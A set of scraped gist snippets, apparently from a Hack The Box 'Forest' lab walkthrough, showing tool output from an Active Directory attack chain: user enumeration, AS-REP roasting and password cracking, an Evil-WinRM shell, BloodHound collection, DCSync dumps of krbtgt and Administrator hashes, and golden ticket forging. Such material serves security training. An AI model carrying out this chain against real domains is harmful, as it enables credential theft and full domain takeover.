This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[*] Creating basic skeleton ticket and PAC Infos | |
[*] Customizing ticket for htb.local/Administrator | |
[*] PAC_LOGON_INFO | |
[*] PAC_CLIENT_INFO_TYPE | |
[*] EncTicketPart | |
[*] EncAsRepPart | |
[*] Signing/Encrypting final ticket | |
[*] PAC_SERVER_CHECKSUM | |
[*] PAC_PRIVSVR_CHECKSUM | |
[*] EncTicketPart |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation | |
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) | |
[*] Using the DRSUAPI method to get NTDS.DIT secrets | |
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8::: | |
[*] Kerberos keys grabbed | |
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b | |
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58 | |
krbtgt:des-cbc-md5:9dd5647a31518ca8 | |
[*] Cleaning up... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation | |
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) | |
[*] Using the DRSUAPI method to get NTDS.DIT secrets | |
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::: | |
[*] Cleaning up... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
INFO: Found AD domain: htb.local | |
INFO: Connecting to LDAP server: FOREST.htb.local | |
INFO: Found 1 domains | |
INFO: Found 1 domains in the forest | |
INFO: Found 2 computers | |
INFO: Connecting to LDAP server: FOREST.htb.local | |
WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153 | |
INFO: Found 31 users | |
INFO: Found 75 groups | |
INFO: Found 0 trusts |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Evil-WinRM shell v2.3 | |
Info: Establishing connection to remote endpoint | |
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir C:\Users\svc-alfresco\Desktop\user.txt | |
Directory: C:\Users\svc-alfresco\Desktop | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Using default input encoding: UTF-8 | |
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x]) | |
Will run 4 OpenMP threads | |
Press 'q' or Ctrl-C to abort, almost any other key for status | |
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL) | |
1g 0:00:00:04 DONE (2020-03-22 13:39) 0.2207g/s 901933p/s 901933c/s 901933C/s s401447401447401447..s3r2s1 | |
Use the "--show" option to display all of the cracked passwords reliably | |
Session completed |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation | |
Name MemberOf PasswordLastSet LastLogon UAC | |
------------ ------------------------------------------------------ -------------------------- -------------------------- -------- | |
svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2020-03-26 23:40:39.044925 2020-03-26 20:23:12.568590 0x410200 | |
$krb5asrep$23$svc-alfresco@HTB.LOCAL:b3267a6ae9aa9e65e8420f161d843772$586e8db69f3b75d97cec66be5659031ace5f68e7e475ff8a3ad0a691a465c0d1d3ed714381bfc535c3e31093c5d55da18a9414ffb5e845fd525ee6e2e75b74f1d40ac19fa54fc1d627ace3fb6c3ab22cc4220cbc32a85ce13752fcf38e47e770b4418a2b5e02b13e62bbd9608b7eaf83d13c0fe589b0b2a4cd4eb25056a3c6e20e713eea3cdf98c7269359ae66afa6b7a640f94c46b37270f43cecb7b52d84c45e44f2943ac89beb7113be8382d974ddb578ae7a0da696b501902a1536547d59f17363b27a6f6a886464bb8b8b2096fe046b1773edeafa016b9e2427cce1bc060df4a82e1510 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rpcclient $> queryusergroups 0x47b | |
group rid:[0x201] attr:[0x7] | |
group rid:[0x47c] attr:[0x7] | |
rpcclient $> querygroup 0x201 | |
Group Name: Domain Users | |
Description: All domain users | |
Group Attribute:7 | |
Num Members:30 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
user:[Administrator] rid:[0x1f4] | |
user:[Guest] rid:[0x1f5] | |
user:[krbtgt] rid:[0x1f6] | |
user:[DefaultAccount] rid:[0x1f7] | |
user:[$331000-VK4ADACQNUCA] rid:[0x463] | |
user:[SM_2c8eef0a09b545acb] rid:[0x464] | |
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465] | |
user:[SM_75a538d3025e4db9a] rid:[0x466] | |
user:[SM_681f53d4942840e18] rid:[0x467] | |
user:[SM_1b41c9286325456bb] rid:[0x468] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:HTB) (signing:True) (SMBv1:True) | |
SMB 10.10.10.161 445 FOREST [-] HTB\: STATUS_ACCESS_DENIED | |
SMB 10.10.10.161 445 FOREST [+] Enumerated domain user(s) | |
SMB 10.10.10.161 445 FOREST htb.local\Administrator badpwdcount: 0 baddpwdtime: 2019-09-22 18:30:53.383284 | |
SMB 10.10.10.161 445 FOREST htb.local\Guest badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58 | |
SMB 10.10.10.161 445 FOREST htb.local\DefaultAccount badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58 | |
SMB 10.10.10.161 445 FOREST htb.local\krbtgt badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58 | |
SMB 10.10.10.161 445 FOREST htb.local\$331000-VK4ADACQNUCA badpwdcount: 0 baddpwdtime: 1600-12-31 19:03 |
NewerOlder